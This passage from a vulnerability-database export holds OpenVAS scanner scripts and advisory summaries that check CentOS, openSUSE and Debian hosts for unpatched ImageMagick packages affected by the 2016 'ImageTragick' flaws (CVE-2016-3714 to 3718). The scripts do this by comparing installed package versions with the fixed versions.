Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\");\n script_tag(name:\"affected\", value:\"ImageMagick on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0726\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-May/021866.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++-devel\", rpm:\"ImageMagick-c++-devel~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.8.9~13.el7_2\", rls:\"CentOS7\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "The remote host is missing an update for the 'ImageMagick' package(s) announced via the referenced advisory.", "modified": "2020-01-31T00:00:00", "published": "2016-05-08T00:00:00", "id": "OPENVAS:1361412562310851304", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851304", "type": "openvas", "title": "openSUSE: Security Advisory for ImageMagick (openSUSE-SU-2016:1261-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851304\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:19:07 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for ImageMagick (openSUSE-SU-2016:1261-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ImageMagick fixes the following issues:\n\n The update disables various insecure coders [boo#978061] These fix issues\n tracked in CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, CVE-2016-3717,\n CVE-2016-3718\");\n\n script_tag(name:\"affected\", value:\"ImageMagick on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1261-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debugsource\", rpm:\"ImageMagick-debugsource~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-extra\", rpm:\"ImageMagick-extra~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-extra-debuginfo\", rpm:\"ImageMagick-extra-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-5\", rpm:\"libMagick++-6_Q16-5~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-5-debuginfo\", rpm:\"libMagick++-6_Q16-5-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-devel\", rpm:\"libMagick++-devel~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-2\", rpm:\"libMagickCore-6_Q16-2~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-2-debuginfo\", rpm:\"libMagickCore-6_Q16-2-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n 
}\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-2\", rpm:\"libMagickWand-6_Q16-2~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-2-debuginfo\", rpm:\"libMagickWand-6_Q16-2-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-PerlMagick\", rpm:\"perl-PerlMagick~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-PerlMagick-debuginfo\", rpm:\"perl-PerlMagick-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel-32bit\", rpm:\"ImageMagick-devel-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-5-32bit\", rpm:\"libMagick++-6_Q16-5-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-5-debuginfo-32bit\", rpm:\"libMagick++-6_Q16-5-debuginfo-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-devel-32bit\", rpm:\"libMagick++-devel-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-2-32bit\", rpm:\"libMagickCore-6_Q16-2-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-2-debuginfo-32bit\", rpm:\"libMagickCore-6_Q16-2-debuginfo-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-2-32bit\", rpm:\"libMagickWand-6_Q16-2-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"libMagickWand-6_Q16-2-debuginfo-32bit\", rpm:\"libMagickWand-6_Q16-2-debuginfo-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:54:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Nikolay Ermishkin from the Mail.Ru Security\nTeam and Stewie discovered several vulnerabilities in ImageMagick, a program suite for\nimage manipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code\n(CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718),\nor delete (CVE-2016-3715), move\n(CVE-2016-3716), or read\n(CVE-2016-3717 \n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. 
In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full removal of the PLT/Gnuplot\ndecoder, and the need for an explicit reference in the filename for the\ninsecure coders.", "modified": "2017-07-07T00:00:00", "published": "2016-05-16T00:00:00", "id": "OPENVAS:703580", "href": "http://plugins.openvas.org/nasl.php?oid=703580", "type": "openvas", "title": "Debian Security Advisory DSA 3580-1 (imagemagick - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3580.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3580-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703580);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_name(\"Debian Security Advisory DSA 3580-1 (imagemagick - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-05-16 00:00:00 +0200 (Mon, 16 May 2016)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3580.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"imagemagick on Debian Linux\");\n script_tag(name: \"insight\", value: \"ImageMagick is a software suite\nto create, edit, and compose bitmap images. It can read, convert and write\nimages in a variety of formats (over 100) including DPX, EXR, GIF, JPEG, JPEG-2000,\nPDF, PhotoCD, PNG, Postscript, SVG, and TIFF. 
Use ImageMagick to translate, flip,\nmirror, rotate, scale, shear and transform images, adjust image colors, apply various\nspecial effects, or draw text, lines, polygons, ellipses and Bzier curves.\nAll manipulations can be achieved through shell commands as well as through\nan X11 graphical interface (display).\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), these\nproblems have been fixed in version 8:6.8.9.9-5+deb8u2.\n\nWe recommend that you upgrade your imagemagick packages.\");\n script_tag(name: \"summary\", value: \"Nikolay Ermishkin from the Mail.Ru Security\nTeam and Stewie discovered several vulnerabilities in ImageMagick, a program suite for\nimage manipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code\n(CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718),\nor delete (CVE-2016-3715), move\n(CVE-2016-3716), or read\n(CVE-2016-3717 \n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. 
In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-dbg:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-dbg:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-doc\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libimage-magick-perl\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libimage-magick-q16-perl\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n 
report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickcore-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6-headers\", 
ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickwand-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"perlmagick\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-31T18:35:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "The remote host is missing an update for the 'ImageMagick' package(s) announced via the referenced advisory.", "modified": "2020-01-31T00:00:00", "published": "2016-05-08T00:00:00", "id": "OPENVAS:1361412562310851305", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851305", "type": "openvas", "title": "openSUSE: Security Advisory for ImageMagick (openSUSE-SU-2016:1266-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under 
the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851305\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:19:13 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for ImageMagick (openSUSE-SU-2016:1266-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled by default but can be re-enabled by\n editing '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n 
(potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n\n - Use external svg loader (rsvg)\n\n This update was imported from the SUSE:SLE-12:Update update project.\");\n\n script_tag(name:\"affected\", value:\"ImageMagick on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1266-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debugsource\", rpm:\"ImageMagick-debugsource~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel\", 
rpm:\"ImageMagick-devel~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-extra\", rpm:\"ImageMagick-extra~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-extra-debuginfo\", rpm:\"ImageMagick-extra-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3\", rpm:\"libMagick++-6_Q16-3~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3-debuginfo\", rpm:\"libMagick++-6_Q16-3-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-devel\", rpm:\"libMagick++-devel~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1\", rpm:\"libMagickCore-6_Q16-1~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo\", rpm:\"libMagickCore-6_Q16-1-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1\", rpm:\"libMagickWand-6_Q16-1~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-debuginfo\", rpm:\"libMagickWand-6_Q16-1-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-PerlMagick\", rpm:\"perl-PerlMagick~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-PerlMagick-debuginfo\", 